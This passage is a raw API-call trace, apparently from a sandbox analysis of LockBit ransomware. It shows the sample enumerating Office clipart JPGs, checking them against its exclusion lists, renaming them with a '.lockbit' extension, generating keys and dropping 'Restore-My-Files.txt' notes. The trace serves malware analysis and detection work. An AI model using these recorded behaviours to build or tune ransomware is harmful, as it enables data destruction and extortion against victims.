(lpString1=".exe", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.489] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.489] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.489] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.489] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.489] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.489] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.489] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.490] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.490] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.491] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.491] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.491] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.491] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.491] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178632.JPG") returned 1 [0147.491] lstrcmpiW (lpString1="ntldr", lpString2="J0178632.JPG") returned 1 [0147.491] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178632.JPG") returned 1 [0147.491] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178632.JPG") returned -1 [0147.491] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178632.JPG") returned -1 [0147.491] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178632.JPG") returned 1 [0147.491] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178632.JPG") returned -1 [0147.491] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.491] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned=".JPG" [0147.491] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.491] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.492] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.492] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.493] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.493] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.493] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG.lockbit") returned 72 [0147.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0147.494] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.494] malloc (_Size=0x40068) returned 0x3df0008 [0147.494] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=23338) returned 1 [0147.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.495] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.497] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.497] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.497] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.499] free (_Block=0x1fa2ed8) [0147.499] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.499] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.499] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7d26, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178639.JPG", cAlternateFileName="")) returned 1 [0147.499] lstrcmpiW (lpString1=".", lpString2="J0178639.JPG") returned -1 [0147.499] lstrcmpiW (lpString1="..", lpString2="J0178639.JPG") returned -1 [0147.499] PathFindExtensionW (pszPath="J0178639.JPG") returned=".JPG" [0147.499] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.499] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.499] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.499] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.500] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.500] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.501] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.501] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178639.JPG") returned 1 [0147.501] lstrcmpiW (lpString1="ntldr", lpString2="J0178639.JPG") returned 1 [0147.502] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178639.JPG") returned 1 [0147.502] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178639.JPG") returned -1 [0147.502] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178639.JPG") returned -1 [0147.502] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178639.JPG") returned 1 [0147.502] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178639.JPG") returned -1 [0147.502] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.502] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned=".JPG" [0147.502] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.502] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.502] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.502] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.503] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.503] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.503] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.503] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG.lockbit") returned 72 [0147.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.505] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.505] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.505] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32038) returned 1 [0147.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.506] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.511] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.511] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.512] free (_Block=0x1fa2ed8) [0147.512] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.512] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.512] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.512] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8a0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0178932.JPG", cAlternateFileName="")) returned 1 [0147.512] lstrcmpiW (lpString1=".", lpString2="J0178932.JPG") returned -1 [0147.512] lstrcmpiW (lpString1="..", lpString2="J0178932.JPG") returned -1 [0147.512] PathFindExtensionW (pszPath="J0178932.JPG") returned=".JPG" [0147.512] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.512] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.512] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.512] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.512] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.512] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.513] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.513] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.514] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.514] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0178932.JPG") returned 1 [0147.514] lstrcmpiW (lpString1="ntldr", lpString2="J0178932.JPG") returned 1 [0147.515] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0178932.JPG") returned 1 [0147.515] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0178932.JPG") returned -1 [0147.515] lstrcmpiW (lpString1="autorun.inf", lpString2="J0178932.JPG") returned -1 [0147.515] lstrcmpiW (lpString1="thumbs.db", lpString2="J0178932.JPG") returned 1 [0147.515] lstrcmpiW (lpString1="iconcache.db", lpString2="J0178932.JPG") returned -1 [0147.515] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.515] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned=".JPG" [0147.515] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.515] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.515] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.515] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.516] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.516] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.516] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.516] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG.lockbit") returned 72 [0147.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft 